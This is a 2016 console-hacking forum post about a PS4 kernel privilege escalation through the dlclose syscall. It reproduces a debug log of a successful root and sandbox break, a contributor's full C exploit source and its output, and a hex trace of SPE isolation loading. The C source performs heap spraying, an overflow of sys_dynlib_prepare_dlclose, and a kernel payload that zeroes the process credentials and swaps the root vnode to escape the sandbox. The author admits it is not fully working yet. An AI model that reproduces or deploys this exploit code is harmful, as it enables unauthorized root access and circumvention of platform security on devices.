Category PS4 Jailbreaking       Thread starter PSXHAX       Start date Mar 21, 2016 at 7:08 PM       11,724       23            
Yesterday we reported news of PS4 Dlclose Root Privilege Escalation, and today PlayStation 4 developer BigBoss returns bringing a PS4 proof-of-concept with LibPS4 / PS4Link / PS4SH Dlclose root privilege escalation and prison break plus sandbox break! :D

From GitHub:
Code:
debug.sh
[PS4][INFO]: debugnet initialized
[PS4][INFO]: Copyright (C) 2010,2016 Antonio Jose Ramos Marquez aka bigboss @psxdev
[PS4][INFO]: ready to have a lot of fun...
[PS4][DEBUG]: executing kernel_exec
[PS4][DEBUG]: [PS4LINK] Server payload thread UID: 0x802E5860
[PS4][DEBUG]: [PS4LINK] Server request thread UID: 0x802F83A0
[PS4][DEBUG]: [PS4LINK] Server command thread UID: 0x802ADF20
[PS4][DEBUG]: [PS4LINK] Created ps4link_requests_sock: 114
[PS4][DEBUG]: [PS4LINK] bind to ps4link_requests_sock done
[PS4][DEBUG]: [PS4LINK] Ready for connection 1
[PS4][DEBUG]: [PS4LINK] Waiting for connection
[PS4][DEBUG]: [PS4LINK] Command Thread Started.
[PS4][DEBUG]: [PS4LINK] Created ps4link_commands_sock: 153
[PS4][DEBUG]: [PS4LINK] Command listener waiting for commands...
[PS4][DEBUG]: socket opened is now equeals fd 3840
[PS4][DEBUG]: Created event queue 0x0000000000000F01
[PS4][DEBUG]: Created event queue 0x0000000000000F02
[PS4][DEBUG]: Created event queue 0x0000000000000F03
[PS4][DEBUG]: Created event queue 0x0000000000000F04
[PS4][DEBUG]: Created event queue 0x0000000000000F05
[PS4][DEBUG]: Created event queue 0x0000000000000F06
[PS4][DEBUG]: Created event queue 0x0000000000000F07
[PS4][DEBUG]: Created event queue 0x0000000000000F08
[PS4][DEBUG]: Created event queue 0x0000000000000F09
[PS4][DEBUG]: Created event queue 0x0000000000000F0A
[PS4][DEBUG]: Created event queue 0x0000000000000F0B
[PS4][DEBUG]: Created event queue 0x0000000000000F0C
[PS4][DEBUG]: Created event queue 0x0000000000000F0D
[PS4][DEBUG]: Created event queue 0x0000000000000F0E
[PS4][DEBUG]: Created event queue 0x0000000000000F0F
[PS4][DEBUG]: Created event queue 0x0000000000000F10
[PS4][DEBUG]: Created event queue 0x0000000000000F11
[PS4][DEBUG]: Created event queue 0x0000000000000F12
[PS4][DEBUG]: Created event queue 0x0000000000000F13
[PS4][DEBUG]: Created event queue 0x0000000000000F14
[PS4][DEBUG]: Created event queue 0x0000000000000F15
[PS4][DEBUG]: Created event queue 0x0000000000000F16
[PS4][DEBUG]: Created event queue 0x0000000000000F17
[PS4][DEBUG]: Created event queue 0x0000000000000F18
[PS4][DEBUG]: Created event queue 0x0000000000000F19
[PS4][DEBUG]: Created event queue 0x0000000000000F1A
[PS4][DEBUG]: Created event queue 0x0000000000000F1B
[PS4][DEBUG]: Created event queue 0x0000000000000F1C
[PS4][DEBUG]: Created event queue 0x0000000000000F1D
[PS4][DEBUG]: Created event queue 0x0000000000000F1E
[PS4][DEBUG]: Created event queue 0x0000000000000F1F
[PS4][DEBUG]: Created event queue 0x0000000000000F20
[PS4][DEBUG]: Created event queue 0x0000000000000F21
[PS4][DEBUG]: Created event queue 0x0000000000000F22
[PS4][DEBUG]: Created event queue 0x0000000000000F23
[PS4][DEBUG]: Created event queue 0x0000000000000F24
[PS4][DEBUG]: Created event queue 0x0000000000000F25
[PS4][DEBUG]: Created event queue 0x0000000000000F26
[PS4][DEBUG]: Created event queue 0x0000000000000F27
[PS4][DEBUG]: Created event queue 0x0000000000000F28
[PS4][DEBUG]: Created event queue 0x0000000000000F29
[PS4][DEBUG]: Created event queue 0x0000000000000F2A
[PS4][DEBUG]: Created event queue 0x0000000000000F2B
[PS4][DEBUG]: Created event queue 0x0000000000000F2C
[PS4][DEBUG]: Created event queue 0x0000000000000F2D
[PS4][DEBUG]: Created event queue 0x0000000000000F2E
[PS4][DEBUG]: Created event queue 0x0000000000000F2F
[PS4][DEBUG]: Created event queue 0x0000000000000F30
[PS4][DEBUG]: Created event queue 0x0000000000000F31
[PS4][DEBUG]: Created event queue 0x0000000000000F32
[PS4][DEBUG]: Created event queue 0x0000000000000F33
[PS4][DEBUG]: Created event queue 0x0000000000000F34
[PS4][DEBUG]: Created event queue 0x0000000000000F35
[PS4][DEBUG]: Created event queue 0x0000000000000F36
[PS4][DEBUG]: Created event queue 0x0000000000000F37
[PS4][DEBUG]: Created event queue 0x0000000000000F38
[PS4][DEBUG]: Created event queue 0x0000000000000F39
[PS4][DEBUG]: Created event queue 0x0000000000000F3A
[PS4][DEBUG]: Created event queue 0x0000000000000F3B
[PS4][DEBUG]: Created event queue 0x0000000000000F3C
[PS4][DEBUG]: Created event queue 0x0000000000000F3D
[PS4][DEBUG]: Created event queue 0x0000000000000F3E
[PS4][DEBUG]: Created event queue 0x0000000000000F3F
[PS4][DEBUG]: Created event queue 0x0000000000000F40
[PS4][DEBUG]: Created event queue 0x0000000000000F41
[PS4][DEBUG]: Created event queue 0x0000000000000F42
[PS4][DEBUG]: Created event queue 0x0000000000000F43
[PS4][DEBUG]: Created event queue 0x0000000000000F44
[PS4][DEBUG]: Created event queue 0x0000000000000F45
[PS4][DEBUG]: Created event queue 0x0000000000000F46
[PS4][DEBUG]: Created event queue 0x0000000000000F47
[PS4][DEBUG]: Created event queue 0x0000000000000F48
[PS4][DEBUG]: Created event queue 0x0000000000000F49
[PS4][DEBUG]: Created event queue 0x0000000000000F4A
[PS4][DEBUG]: Created event queue 0x0000000000000F4B
[PS4][DEBUG]: Created event queue 0x0000000000000F4C
[PS4][DEBUG]: Created event queue 0x0000000000000F4D
[PS4][DEBUG]: Created event queue 0x0000000000000F4E
[PS4][DEBUG]: Created event queue 0x0000000000000F4F
[PS4][DEBUG]: Created event queue 0x0000000000000F50
[PS4][DEBUG]: Created event queue 0x0000000000000F51
[PS4][DEBUG]: Created event queue 0x0000000000000F52
[PS4][DEBUG]: Created event queue 0x0000000000000F53
[PS4][DEBUG]: Created event queue 0x0000000000000F54
[PS4][DEBUG]: Created event queue 0x0000000000000F55
[PS4][DEBUG]: Created event queue 0x0000000000000F56
[PS4][DEBUG]: Created event queue 0x0000000000000F57
[PS4][DEBUG]: Created event queue 0x0000000000000F58
[PS4][DEBUG]: Created event queue 0x0000000000000F59
[PS4][DEBUG]: Created event queue 0x0000000000000F5A
[PS4][DEBUG]: Created event queue 0x0000000000000F5B
[PS4][DEBUG]: Created event queue 0x0000000000000F5C
[PS4][DEBUG]: Created event queue 0x0000000000000F5D
[PS4][DEBUG]: Created event queue 0x0000000000000F5E
[PS4][DEBUG]: Created event queue 0x0000000000000F5F
[PS4][DEBUG]: Created event queue 0x0000000000000F60
[PS4][DEBUG]: Created event queue 0x0000000000000F61
[PS4][DEBUG]: Created event queue 0x0000000000000F62
[PS4][DEBUG]: Created event queue 0x0000000000000F63
[PS4][DEBUG]: Created event queue 0x0000000000000F64
[PS4][DEBUG]: Created event queue 0x0000000000000F65
[PS4][DEBUG]: m event queue created  0x00000F65
[PS4][DEBUG]: Created event queue 0x0000000000000F66
[PS4][DEBUG]: m2 event queue created  0x00000F66
[PS4][DEBUG]: sceKernelDeleteEqueue return: 0x00000000
[PS4][DEBUG]: mapping pointer 20146c000
[PS4][DEBUG]: [+] UID: 1, GID: 1
[PS4][DEBUG]: before SYS_dynlib_prepare_dlclose
[PS4][DEBUG]: SYS_dynlib_prepare_dlclose: -1
[PS4][DEBUG]: before sceKernelDeleteEqueue
  [+] Entered critical payload
  [+] cred
  [+] cred->cr_uid  cred->cr_ruid  cred->cr_rgid set to 0
  [+] set group0 to 0
  [+] get prison0
  [+] set prison0
  [+] get td_fdp_fd_rdir
  [+] get td_fdp_fd_jdir
  [+] get rootnode
  [+] set rootnode to td_fdp_fd_rdir
  [+] set rootnode to td_fdp_fd_jdir

now we have uploaded our payload and ps4link loaded :) do you wanna ha fun?
./ps4sh
ps4sh version 1.0
/Users/bigboss/.ps4shrc: No such file or directory
Connecting to fio ps4link ip 192.168.1.17
log: [HOST][INFO]: [PS4SH] Ready
log: [PS4][DEBUG]: [PS4LINK] Client connected from 192.168.1.3 port: 26817
log: [PS4][DEBUG]: [PS4LINK] sock ps4link_fileio set 148 connected 1
log: [PS4][DEBUG]: [PS4LINK] Waiting for connection
log: [PS4][DEBUG]: [PS4LINK] Initialized and connected from pc/mac ready to receive commands
ps4sh> execsprx
log: [HOST][DEBUG]: [PS4SH] [PS4SH] argc=0 argv=���������
log: [PS4][DEBUG]: [PS4LINK] commands listener received packet size (266)
log: [PS4][DEBUG]: [PS4LINK] Received command whoami argc=0 argv=
log: [PS4][DEBUG]: [+] UID: 0, GID: 0
log: [PS4][DEBUG]: [DIR]: .
log: [PS4][DEBUG]: [DIR]: ..
log: [PS4][DEBUG]: [DIR]: adm
log: [PS4][DEBUG]: [DIR]: app_tmp
log: [PS4][DEBUG]: [DIR]: data
log: [PS4][DEBUG]: [DIR]: dev
log: [PS4][DEBUG]: [DIR]: eap_user
log: [PS4][DEBUG]: [DIR]: eap_vsh
log: [PS4][DEBUG]: [DIR]: hdd
log: [PS4][DEBUG]: [DIR]: host
log: [PS4][DEBUG]: [DIR]: hostapp
log: [PS4][DEBUG]: [FILE]: mini-syscore.elf
log: [PS4][DEBUG]: [DIR]: mnt
log: [PS4][DEBUG]: [DIR]: preinst
log: [PS4][DEBUG]: [DIR]: preinst2
log: [PS4][DEBUG]: [FILE]: safemode.elf
log: [PS4][DEBUG]: [FILE]: SceBootSplash.elf
log: [PS4][DEBUG]: [FILE]: SceSysAvControl.elf
log: [PS4][DEBUG]: [DIR]: system
log: [PS4][DEBUG]: [DIR]: system_data
log: [PS4][DEBUG]: [DIR]: system_ex
log: [PS4][DEBUG]: [DIR]: system_tmp
log: [PS4][DEBUG]: [DIR]: update
log: [PS4][DEBUG]: [DIR]: usb
log: [PS4][DEBUG]: [DIR]: user
ps4sh>
:) achieved on March 21th a few months late but doesn't matter because i am going to have a lot of fun now.

Also from Zer0xFF, to quote: Ok, so this is as far as I've gotten, Thanks to bigboss, i realised the issue he mentioned with the close during KernelAlloc,

so i used the example from hitodama just to save myself few minutes of testing... and now we're getting better results, just not as close as i would have liked.

for the sake of openness, this is what I've put together so far: PS4-dlclose.c
Code:
#include "ps4.h"
#include "define.h"
//#include <sys/queue.h>
//#include <sys/event.h>

/*
Not working yet,
could be wrong allocations,
wrong close vs sceKernelDeleteEqueue
could be wrong overflow structure (struct knote **overflow).. klist?
maybe I missed a step somewhere
*/

volatile static int netsock;
static int globalFileDescriptor = 0;

/*
kexecGenerateFileDescriptor taken from https://github.com/ps4dev/libps4-examples/blob/master/kernel/kexec/source/alloc.c#L6
*/
int kexecGenerateFileDescriptor(int number)
{
    int t[0x2800];
    int fd, base, diff, i, err;

    fd = -1;
    err = 0;

    //base = open("/dev/null", O_RDWR);
    base = sceNetSocket("psudodup2", AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(number == base)
        return base;
    if(number < base)
    {
        close(base);
        return -2;
    }

    diff = number - base - 3;
    if(diff < 0)
    {
        close(base);
        return -3;
    }

    for(i = 0; i < diff; ++i)
    {
        t[i] = sceNetSocket("psudodup2", AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(t[i] < 0)
        {
            err = 1;
            diff = i - 1;
            break;
        }
    }

    if(err == 0)
        fd = sceNetSocket("psudodup2", AF_INET, SOCK_STREAM, IPPROTO_TCP);

    for(i = 0; i < diff; ++i)
        close(t[i]);

    close(base);
    return fd;
}
// Perform kernel allocation aligned to 0x800 bytes
int kernelAllocation(size_t size) {
    SceKernelEqueue kv;
    sceKernelCreateEqueue(&kv, "dlclose");
    //struct kevent kv;
    //int queue = kqueue();
 

    int fd = (size - 0x800) / 8;
 
    //static int sock = 0;

    //since dup2 is not allowed
    /*while(sock != fd) {
        sock = sceNetSocket("psudodup2", AF_INET, SOCK_STREAM, 0);
    }
    sceNetSocketClose(sock);
    */
 
    //perhaps sceNetSocketClose?
    //printf("sock = fd\n");
    if(globalFileDescriptor == 0) // only one fd, thus size is used for all chunks
        globalFileDescriptor = kexecGenerateFileDescriptor(fd);
    if(globalFileDescriptor < 0)
    {
        close(kv);
        return -2;
    }
 
 
    //EV_SET(&kv, fd, EVFILT_READ, EV_ADD, 0, 5, NULL);
    //kevent(queue, &kv, 1, 0, 0, 0);
    sceKernelAddReadEvent(kv, globalFileDescriptor, 0, NULL);
 
 
    //close(fd);
    //fclose?
    printf("queue created = %p\n", kv);
    return kv;
}

void kernelFree(int allocation) {
    if (0 == 1){
        printf("Trigger sceKernelDeleteEqueue\n");
        sceKernelDeleteEqueue(allocation);
    } else {
        printf("Trigger close\n");
        close(allocation);
    }
}

char *criticalPayloadMessage = "  [+] Entered critical payload\n";
void payload(struct knote *kn) {
    struct thread *td;

    struct ucred *cred;
 
    asm volatile("mov %0, %%gs:0" : "=r"(td));

    {
        int (*sendto)(struct thread *td, struct sendto_args *uap) = (void *)0xFFFFFFFF8249EC10;

        struct sendto_args args = { netsock, criticalPayloadMessage, strlen(criticalPayloadMessage), 0, NULL, 0 };
        sendto(td, &args);

    }
 
    //printf("  [+] Entered kernel payload!\n");
 
    // Privilege escalation
    // Escalate process to root
    // Resolve creds
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

 
    // Jailbreak yet to figure this out
    //cred->cr_prison = &jail->prison0;
 
    // Sandbox escape
    void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
    uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
    uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
    uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
    *td_fdp_fd_rdir = *rootvnode;
    *td_fdp_fd_jdir = *rootvnode;
 
 
    // Enable UART output
    uint16_t *bootParams = (uint16_t *)0xFFFFFFFF833242F6;
    *bootParams &= ~(1 << 15);
 
    // Disable write protection
    //...

    // Patch kernel functions
    //...
 
    // Restore write protection
    //...
 
    // Install kexec system call
    //...
 
    // etc...

    //return to shell?
    asm volatile("swapgs");
    asm volatile("sysretq");
}

void *exploitThread(void *arg) {
    // Perform oveflow - userland:
    uint64_t bufferSize = 0x8000;
    uint64_t overflowSize = 0x8000;

    uint64_t mappingSize = bufferSize + overflowSize;

    int64_t count = (0x100000000 + bufferSize) / 4;

 
    int allocation[100], m, m2;

    // Spray the heap
    printf("fd = %d\n", (bufferSize - 0x800) / 8); 
    int i;
    for(i = 0; i < 100; i++) {
        allocation[i] = kernelAllocation(bufferSize);
    }

 
    // Create hole for the system call's allocation
    printf("m kernelAllocation:\n");
    m = kernelAllocation(bufferSize);
    printf("m2 kernelAllocation:\n");
    m2 = kernelAllocation(bufferSize);
    kernelFree(m);

    // Map the buffer, spray the heap, etc
    uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    munmap(mapping + mappingSize, PAGE_SIZE);

    //memset(mapping + bufferSize, 'a', overflowSize);
    //int i;
    struct knote kn;
    struct filterops fo;
 
    printf("perform overflow?\n");
    struct knote **overflow =(struct knote **)(mapping + bufferSize);
    for(i = 0; i < overflowSize / sizeof(struct knote *); i++) {
            overflow[i] = &kn;
    }

    kn.kn_fop = &fo;

    fo.f_detach = payload;


    // Perform the overflow
    printf("Calling sys_dynlib_prepare_dlclose\n");
    syscall(597, 1, mapping, &count);
 
    /*
    printf("Close Alloc\n");
    for(i = 0; i < 100; i++) {
        close(allocation[i]);
    }
    */

    // Execute the payload
    printf("moment of truth\n");
    kernelFree(m2);
 
    return NULL;
}

int _main(void) {
    ScePthread thread;
 
    // Resolve functions, connect to socket, etc
    initKernel(); 
    initLibc();
    initNetwork();
    initJIT();
    initPthread();


    // -- DEBUG SOCKET --
    struct sockaddr_in server;
    server.sin_len = sizeof(server);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = IP(192, 168, 1, 91);
    server.sin_port = sceNetHtons(9023);
    memset(server.sin_zero, 0, sizeof(server.sin_zero));
    netsock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
    sceNetConnect(netsock, (struct sockaddr *)&server, sizeof(server));
    int flag = 1;
    sceNetSetsockopt(netsock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
    // -- DEBUG SOCKET --
 
    printf("[+] Starting...\n");
    printf("[+] UID = %d\n", getuid());
 
    // Create exploit thread
    if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
        printf("[-] scePthreadCreate\n");
        sceNetSocketClose(netsock);
        return 1;
    }
 
    // Wait for thread to exit
    scePthreadJoin(thread, NULL);
 
    // At this point we should have root and jailbreak
    if(getuid() != 0) {
        printf("[-] Kernel patch failed!\n");
        sceNetSocketClose(netsock);
        return 1;
    }
 
    printf("[+] Kernel patch success!\n");
 
    // Dump files, patch memory from other processes, boot Linux, etc
    //...
 
    sceNetSocketClose(netsock);
    return 0;
}
and this is our current output:
Code:
[+] Starting...
[+] UID = 1
fd = 3840
queue created = 6400000055
queue created = 6500000056
queue created = 6600000057
queue created = 6700000058
queue created = 6800000059
queue created = 690000005a
queue created = 6a0000005b
queue created = 6b0000005c
queue created = 6c0000005d
queue created = 6d0000005e
queue created = 6e0000005f
queue created = 6f00000060
queue created = 7000000061
queue created = 7100000062
queue created = 7200000063
queue created = 7300000064
queue created = 7400000065
queue created = 7500000066
queue created = 7600000067
queue created = 7700000068
queue created = 7800000069
queue created = 790000006a
queue created = 7a0000006b
queue created = 7b0000006c
queue created = 7c0000006d
queue created = 7d0000006e
queue created = 7e0000006f
queue created = 7f00000070
queue created = 8000000071
queue created = 8100000072
queue created = 8200000073
queue created = 8300000074
queue created = 8400000075
queue created = 8500000076
queue created = 8600000077
queue created = 8700000078
queue created = 8800000079
queue created = 890000007a
queue created = 8a0000007b
queue created = 8b0000007c
queue created = 8c0000007d
queue created = 8d0000007e
queue created = 8e0000007f
queue created = 8f00000080
queue created = 9000000081
queue created = 9100000082
queue created = 9200000083
queue created = 9300000084
queue created = 9400000085
queue created = 9500000086
queue created = 9600000087
queue created = 9700000088
queue created = 9800000089
queue created = 990000008a
queue created = 9a0000008b
queue created = 9b0000008c
queue created = 9c0000008d
queue created = 9d0000008e
queue created = 9e0000008f
queue created = 9f00000090
queue created = a000000091
queue created = a100000092
queue created = a200000093
queue created = a300000094
queue created = a400000095
queue created = a500000096
queue created = a600000097
queue created = a700000098
queue created = a800000099
queue created = a90000009a
queue created = aa0000009b
queue created = ab0000009c
queue created = ac0000009d
queue created = ad0000009e
queue created = ae0000009f
queue created = af000000a0
queue created = b0000000a1
queue created = b1000000a2
queue created = b2000000a3
queue created = b3000000a4
queue created = b4000000a5
queue created = b5000000a6
queue created = b6000000a7
queue created = b7000000a8
queue created = b8000000a9
queue created = b9000000aa
queue created = ba000000ab
queue created = bb000000ac
queue created = bc000000ad
queue created = bd000000ae
queue created = be000000af
queue created = bf000000b0
queue created = c0000000b1
queue created = c1000000b2
queue created = c2000000b3
queue created = c3000000b4
queue created = c4000000b5
queue created = c5000000b6
queue created = c6000000b7
queue created = c7000000b8
m kernelAllocation:
queue created = c8000000b9
m2 kernelAllocation:
queue created = c9000000ba
Trigger close
perform overflow?
Calling sys_dynlib_prepare_dlclose
moment of truth
Trigger close
thanks to eXtreme and wildcard for testing.

Not sure how much time I'll have this week but hopefully with imminent release from bigboss we won't have to worry about this to much, though I wanted to be 1st to get this out, ill admit defeat to bigboss, but I might try getting linux booted before anyone else then? :)

small comment on the code "could be wrong allocations, wrong close vs sceKernelDeleteEqueuecould, can be wrong overflow structure (struct knote **overflow).. list? or maybe I missed a step somewhere" or perhaps it my invalid knote structure in define.h?, comments are welcome.

From GitHub:
Code:
Using spe 0
Creating buffers
Buffers created
File loaded
Buffer initialized
ChanCount 0: 0000000000000000
ChanCount 1: 0000000000000000
ChanCount 2: 0000000000000000
ChanCount 3: 0000000000000000
ChanCount 4: 0000000000000000
ChanCount 5: 0000000000000000
ChanCount 6: 0000000000000000
ChanCount 7: 0000000000000000
ChanCount 8: 0000000000000000
ChanCount 9: 0000000000000001
ChanCount 10: 0000000000000000
ChanCount 11: 0000000000000000
ChanCount 12: 0000000000000000
ChanCount 13: 0000000000000000
ChanCount 14: 0000000000000000
ChanCount 15: 0000000000000000
ChanCount 16: 0000000000000000
ChanCount 17: 0000000000000000
ChanCount 18: 0000000000000000
ChanCount 19: 0000000000000000
ChanCount 20: 0000000000000000
ChanCount 21: 0000000000000010
ChanCount 22: 0000000000000000
ChanCount 23: 0000000000000001
ChanCount 24: 0000000000000000
ChanCount 25: 0000000000000000
ChanCount 26: 0000000000000000
ChanCount 27: 0000000000000000
ChanCount 28: 0000000000000001
ChanCount 29: 0000000000000000
ChanCount 30: 0000000000000001
ChanCount 31: 0000000000000000
ChanCount 0: 0000000000000000
ChanCount 1: 0000000000000000
ChanCount 2: 0000000000000000
ChanCount 3: 0000000000000000
ChanCount 4: 0000000000000000
ChanCount 5: 0000000000000000
ChanCount 6: 0000000000000000
ChanCount 7: 0000000000000000
ChanCount 8: 0000000000000000
ChanCount 9: 0000000000000001
ChanCount 10: 0000000000000000
ChanCount 11: 0000000000000000
ChanCount 12: 0000000000000000
ChanCount 13: 0000000000000000
ChanCount 14: 0000000000000000
ChanCount 15: 0000000000000000
ChanCount 16: 0000000000000000
ChanCount 17: 0000000000000000
ChanCount 18: 0000000000000000
ChanCount 19: 0000000000000000
ChanCount 20: 0000000000000000
ChanCount 21: 0000000000000010
ChanCount 22: 0000000000000000
ChanCount 23: 0000000000000001
ChanCount 24: 0000000000000000
ChanCount 25: 0000000000000000
ChanCount 26: 0000000000000000
ChanCount 27: 0000000000000000
ChanCount 28: 0000000000000001
ChanCount 29: 0000000000000000
ChanCount 30: 0000000000000001
ChanCount 31: 0000000000000000
Starting main loop
STATUS 281
MFCCNTL 0
End of isolation load [89]00000020 - 0000: 0x0000020000511048 <- 0x3E008 1F 26 00 00 00 00 00 00 (0x8)
00000113 - 0001: 0x0000020000511448 <- 0x3E008 08 26 00 00 00 00 00 00 (0x8)
00000151 - 0002: 0x0000020000512008 <- 0x3E008 04 00 00 00 00 00 00 00 (0x8)
00000193 - 0003: 0x0000020000513008 <- 0x3E008 04 00 00 00 00 00 00 00 (0x8)
00000231 - 0004: 0x0000020000511800 <- 0x3E000 88 06 80 00 00 00 00 00 (0x8)
00000272 - 0005: 0x0000024000FFF508 <- 0x3E008 00 00 FF 00 (0x4)
00000305 - 0006: 0x0000024000FFF530 <- 0x3E000 00 00 FF A0 (0x4)
00000341 - 0007: 0x0000024000FFF310 <- 0x3E000 00 00 80 8F (0x4)
00000373 - 0008: 0x0000024000FFF310 <- 0x3E000 00 00 00 8E (0x4)
00000410 - 0009: 0x0000024000FFF300 <- 0x3E000 00 00 40 20 (0x4)
00000442 - 000A: 0x0000024000FFF304 <- 0x3E004 00 00 00 00 (0x4)
00000478 - 000B: 0x0000024000FFF314 <- 0x3E004 00 00 00 02 (0x4)
00000511 - 000C: 0x0000024000FFF318 <- 0x3E008 00 00 00 17 (0x4)
00000547 - 000D: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00000579 - 000E: 0x000002400008DFF0 <- 0x3E000 00 00 00 00 (0x4)
00000616 - 000F: 0x000002400008DFF4 <- 0x3E004 00 00 00 00 (0x4)
00000648 - 0010: 0x000002400008DFF2 -> 0x3E002 00 00 (0x2)
00000681 - 0011: 0x000002400008CFF6 -> 0x3E006 00 00 (0x2)
00000711 - 0012: 0x000002400008D000 <- 0x3E000 FF 01 00 00 00 00 81 00 00 00 00 00 00 01 00 01 01 00 00 00 00 00 FE 7C 00 00 00 00 00 00 00 00 (0x20)
00000783 - 0013: 0x000002400008DFF0 <- 0x3E000 00 01 00 01 (0x4)
00000816 - 0014: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00000852 - 0015: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 41 41 41 41
00000907 - 0016: 0x000002400008CFF8 -> 0x3E008 FF FF FF FF FF FF FF FF (0x8)
00000946 - 0017: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00000977 - 0018: 0x000002400008DFF2 -> 0x3E002 00 01 (0x2)
00001011 - 0019: 0x000002400008CFF6 -> 0x3E006 00 01 (0x2)
00001090 - 001A: 0x000002400008D000 <- 0x3E000 18 01 00 01 00 00 80 1A 00 00 00 00 00 02 00 02 01 14 00 00 00 00 FF 33 00 00 00 00 00 00 00 00 (0x20)
00001164 - 001B: 0x000002400008DFF0 <- 0x3E000 00 02 00 02 (0x4)
00001196 - 001C: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00001232 - 001D: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 18 01 00 01 00 00 80 1A 00 00 00 00 00 04 00 04 00 14 01 05 FF FF FF 2A
00001295 - 001E: 0x000002400008CFF2 -> 0x3E002 00 02 (0x2)
00001329 - 001F: 0x000002400008DFF6 -> 0x3E006 00 01 (0x2)
00001358 - 0020: 0x000002400008CFF6 -> 0x3E006 00 02 (0x2)
00001391 - 0021: 0x000002400008CFF2 -> 0x3E002 00 02 (0x2)
00001420 - 0022: 0x000002400008DFF6 -> 0x3E006 00 01 (0x2)
00001454 - 0023: 0x000002400008C000 -> 0x3E000 18 01 00 01 00 00 80 1A 00 00 00 00 00 04 00 04 (0x10)
Reading header
00001498 - 0024: 0x000002400008C000 -> 0x3E000 18 01 00 01 00 00 80 1A 00 00 00 00 00 04 00 04 00 14 01 05 FF FF FF 2A 41 41 41 41 41 41 41 41 (0x20)
Reading data 0
00001563 - 0025: 0x000002400008DFF4 <- 0x3E004 00 02 00 02 (0x4)
00001595 - 0026: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00001632 - 0027: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00001663 - 0028: 0x000002400008DFF2 -> 0x3E002 00 02 (0x2)
00001697 - 0029: 0x000002400008CFF6 -> 0x3E006 00 02 (0x2)
00001726 - 002A: 0x000002400008D000 <- 0x3E000 14 01 00 02 00 00 80 17 00 00 00 00 00 04 00 04 20 02 00 13 00 00 FF 15 41 41 41 41 41 41 41 41 (0x20)
00001797 - 002B: 0x000002400008DFF0 <- 0x3E000 00 03 00 03 (0x4)
00001829 - 002C: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00001866 - 002D: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 14 01 00 02 00 00 80 17 00 00 00 00 00 17 00 17 00 02 00 13 00 00 00 A0 00 00 00 A0 00 00 00 A0 00 00 00 A0 00 00 00 41 FF FF FC 4E
00001946 - 002E: 0x000002400008CFF2 -> 0x3E002 00 03 (0x2)
00001980 - 002F: 0x000002400008DFF6 -> 0x3E006 00 02 (0x2)
00002009 - 0030: 0x000002400008CFF6 -> 0x3E006 00 03 (0x2)
00002042 - 0031: 0x000002400008CFF2 -> 0x3E002 00 03 (0x2)
00002071 - 0032: 0x000002400008DFF6 -> 0x3E006 00 02 (0x2)
00002104 - 0033: 0x000002400008C000 -> 0x3E000 14 01 00 02 00 00 80 17 00 00 00 00 00 17 00 17 (0x10)
Reading header
00002149 - 0034: 0x000002400008C000 -> 0x3E000 14 01 00 02 00 00 80 17 00 00 00 00 00 17 00 17 00 02 00 13 00 00 00 A0 00 00 00 A0 00 00 00 A0 00 00 00 A0 00 00 00 41 FF FF FC 4E 41 41 41 41 (0x30)
Reading data 1
00002230 - 0035: 0x000002400008DFF4 <- 0x3E004 00 03 00 03 (0x4)
00002262 - 0036: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00002299 - 0037: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00002330 - 0038: 0x000002400008DFF2 -> 0x3E002 00 03 (0x2)
00002364 - 0039: 0x000002400008CFF6 -> 0x3E006 00 03 (0x2)
00002393 - 003A: 0x000002400008D000 <- 0x3E000 12 01 00 03 00 00 80 16 00 00 00 00 00 02 00 02 03 10 00 00 00 00 FF 3D 00 00 00 A0 00 00 00 A0 (0x20)
00002465 - 003B: 0x000002400008DFF0 <- 0x3E000 00 04 00 04 (0x4)
00002497 - 003C: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00002534 - 003D: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 12 01 00 03 00 00 80 16 00 00 00 00 00 02 00 02 03 00 00 00 FF FF FF 4D
00002594 - 003E: 0x000002400008CFF2 -> 0x3E002 00 04 (0x2)
00002627 - 003F: 0x000002400008DFF6 -> 0x3E006 00 03 (0x2)
00002656 - 0040: 0x000002400008CFF6 -> 0x3E006 00 04 (0x2)
00002690 - 0041: 0x000002400008CFF2 -> 0x3E002 00 04 (0x2)
00002719 - 0042: 0x000002400008DFF6 -> 0x3E006 00 03 (0x2)
00002752 - 0043: 0x000002400008C000 -> 0x3E000 12 01 00 03 00 00 80 16 00 00 00 00 00 02 00 02 (0x10)
Reading header
00002796 - 0044: 0x000002400008C000 -> 0x3E000 12 01 00 03 00 00 80 16 00 00 00 00 00 02 00 02 03 00 00 00 FF FF FF 4D 00 00 00 A0 00 00 00 A0 (0x20)
Reading data 2
00002864 - 0045: 0x000002400008DFF4 <- 0x3E004 00 04 00 04 (0x4)
00002896 - 0046: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
